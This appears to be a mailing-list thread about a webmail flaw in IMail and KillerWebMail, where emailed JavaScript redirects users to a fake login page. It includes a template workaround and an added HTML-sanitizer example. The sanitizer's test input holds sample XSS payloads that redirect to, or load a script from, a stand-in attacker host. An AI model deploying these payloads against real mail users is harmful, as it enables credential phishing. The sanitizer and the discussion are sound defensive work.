As the Russians once said... "Many tanks." That will keep users from being "locked out". In addition to waiting for IPSwitch to come up with some fix, I'm going to try loading <!--IMail.MailMessage--> into a CDATA field, then use the template to read/parse the mail message. This will prevent the browser from getting to the script before I do. The only problem is going to be the overhead to scrub the messages.

Your KWM templates rock, BTW. The IMail tags are a dog to work with, but I'm glad they're there.

-Norm
Norm et al.,

You can disable the automatic preview of messages in KillerWebMail by editing the msgsum.html file. Find this block of code at about line 369:
    function myLoad(){
        // reset reload count, because user is obviously active
        parent.refreshCount=0
        if(parent.previewFrame){
            <!--IMAIL.BeginIfMsgCount.EQ 0-->
            parent.previewFrame.location.href="readfail.html?blank=yes"
            <!--IMAIL.ElseBeginIfMsgCount-->
            parent.previewFrame.location.href="rmail.<!--IMAIL.Number-->.cgi?mbx="+MailboxLink+"&msgsort="+z
            <!--IMAIL.EndBeginIfMsgCount-->
        }
    }
and comment out the reload lines (changes shown in red... one of the few times I like html msgs to a list):
    function myLoad(){
        // reset reload count, because user is obviously active
        parent.refreshCount=0
        if(parent.previewFrame){
            <!--IMAIL.BeginIfMsgCount.EQ 0-->
            //parent.previewFrame.location.href="readfail.html?blank=yes"
            <!--IMAIL.ElseBeginIfMsgCount-->
            //parent.previewFrame.location.href="rmail.<!--IMAIL.Number-->.cgi?mbx="+MailboxLink+"&msgsort="+z
            <!--IMAIL.EndBeginIfMsgCount-->
        }
    }
Note that the only way to prevent this "hack" (embedded JavaScript commands) is for Ipswitch to rewrite the iwebmsg service so it parses out all JavaScript from the message body before sending it to the browser.
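Both the scrubbing Norm plans in his reply above (pull the message body into a field and parse it before the browser ever sees it) and the server-side fix asked of Ipswitch here (strip the JavaScript out of the body before it is sent) come down to the same component: an HTML sanitizer that runs before the preview frame renders the message. The block below is an added example written for this page; it is not code from the thread, from IMail or from KillerWebMail. It is plain Node JavaScript with no dependencies. The sample message body is constructed for the example and the hosts `attacker.example` and `example.org` are placeholders; it is the kind of message the thread describes, one whose script bounces the whole webmail window to a look-alike login page, tried several ways (a script block, an event handler attribute, a `javascript:` link with an entity-encoded colon, an IE conditional comment and a `meta refresh`).

```javascript
'use strict';

// Allowlist of elements a mail body may keep. Anything else (script, iframe,
// object, embed, meta, form, base, ...) is removed. The elements listed in
// DROP_WITH_CONTENT also lose their body, since that body is the payload.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'u', 'em', 'strong', 'a', 'ul', 'ol', 'li',
  'div', 'span', 'table', 'tbody', 'thead', 'tr', 'td', 'th', 'blockquote', 'pre', 'font',
  'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'img', 'hr']);
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'noscript']);
// Attribute allowlist: no on* handlers and no style=, so there is no denylist to slip past.
const ALLOWED_ATTRS = new Set(['href', 'src', 'alt', 'title', 'color', 'size', 'face',
  'width', 'height', 'align', 'border', 'cellpadding', 'cellspacing']);
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto', 'cid']);
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", colon: ':', tab: '\t', newline: '\n' };

// Decode entities before inspecting a URL, so "jAvAsCrIpT&#58;" is seen as "javascript:".
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([a-z]+);/gi, (m, n) => NAMED[n.toLowerCase()] ?? m);
}

// A URL is kept if it is relative or uses an allowlisted scheme. Control characters and
// whitespace are stripped first, because browsers ignore them in forms like "java\tscript:".
function safeUrl(raw) {
  const v = decodeEntities(raw).replace(/[\u0000-\u0020\u007f-\u009f]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  return m === null || SAFE_SCHEMES.has(m[1]);
}

const TAG_RE = /^<(\/?)([a-zA-Z][\w:-]*)((?:[^>"']|"[^"]*"|'[^']*')*)>/;
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Rebuild the body from the allowlist: only known tags and known attributes are emitted.
function sanitizeHtml(html) {
  const out = [];
  let i = 0;
  let skipUntil = null; // element whose body is being discarded, e.g. "script"
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) { if (skipUntil === null) out.push(html.slice(i)); break; }
    if (skipUntil === null) out.push(html.slice(i, lt));
    if (html.startsWith('<!--', lt)) {                   // comments, incl. IE conditional comments
      const end = html.indexOf('-->', lt + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    if (html.startsWith('<!', lt) || html.startsWith('<?', lt)) {   // doctype, processing instructions
      const end = html.indexOf('>', lt);
      i = end === -1 ? html.length : end + 1;
      continue;
    }
    const m = TAG_RE.exec(html.slice(lt));
    if (m === null) {                                    // a bare "<" in text: neutralise it
      if (skipUntil === null) out.push('&lt;');
      i = lt + 1;
      continue;
    }
    const [whole, closing, rawName, attrStr] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (skipUntil !== null) { if (closing && name === skipUntil) skipUntil = null; continue; }
    if (DROP_WITH_CONTENT.has(name)) { if (!closing) skipUntil = name; continue; }
    if (!ALLOWED_TAGS.has(name)) continue;               // unknown tag: drop the tag, keep its text
    if (closing) { out.push(`</${name}>`); continue; }
    const attrs = [];
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(attrStr)) !== null) {
      const key = a[1].toLowerCase();
      const val = a[2] ?? a[3] ?? a[4] ?? '';
      if (!ALLOWED_ATTRS.has(key)) continue;             // drops onload=, onerror=, style=, ...
      if (URL_ATTRS.has(key) && !safeUrl(val)) continue; // drops javascript:, data:, vbscript:
      attrs.push(` ${key}="${val.replace(/"/g, '&quot;')}"`);
    }
    out.push(`<${name}${attrs.join('')}>`);
  }
  return out.join('');
}

// Constructed sample body (not the message actually sent to the list address): it tries to
// send the webmail window to a faux login page five different ways.
const MALICIOUS_BODY = [
  '<p>Hi, please see the <a href="http://example.org/report">report</a>.</p>',
  '<script>top.location.href="http://attacker.example/faux-login.html";</script>',
  '<img src="x" onerror="top.location=\'http://attacker.example/faux-login.html\'">',
  '<a href="jAvAsCrIpT&#58;top.location=\'http://attacker.example/faux-login.html\'">click</a>',
  '<!--[if IE]><script src="http://attacker.example/ie.js"></script><![endif]-->',
  '<meta http-equiv="refresh" content="0;url=http://attacker.example/faux-login.html">',
].join('\n');

console.log(sanitizeHtml(MALICIOUS_BODY));
```

The point of the allowlist is that the thread's phrasing, "parse out all JavaScript", describes a denylist, and denylists lose: an encoded colon, a tab inside `javascript:`, a conditional comment or an attribute nobody thought of all get through. Emitting only what is known to be safe avoids that class of bypass. The tokenizer here is deliberately small and is not an HTML5 parser; browsers' error recovery can disagree with a hand-rolled tokenizer on malformed input, so for production a parser-backed sanitizer (or sanitizing after parsing into a real DOM) is the safer choice. The sanitizer also has to run on the server, as the message asks of iwebmsg: anything done in the browser runs in the same window the script has already reached.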
Wow... it's a little worse in KWM. I just tried a test on the [EMAIL PROTECTED] address. Since the preview for the first message in the Inbox comes up automatically, you can't even read your other mail. It just forwards you to the faux login page as soon as you log in. The only way to read the rest of your mail is to send yourself another message (so the preview for the malicious email doesn't automatically kick in).

Does anyone else see this as a problem or is there some easy setting that I'm not aware of to neutralize this issue?

-Norm
Hi again,

It can now send the same type of email to KillerWebMail users, as well as default template users. Again, even if the login screen doesn't use the same template, all a malicious user has to do is cut and paste the HTML off the login page onto their own version.

Norman Nolasco
Advarion Incorporated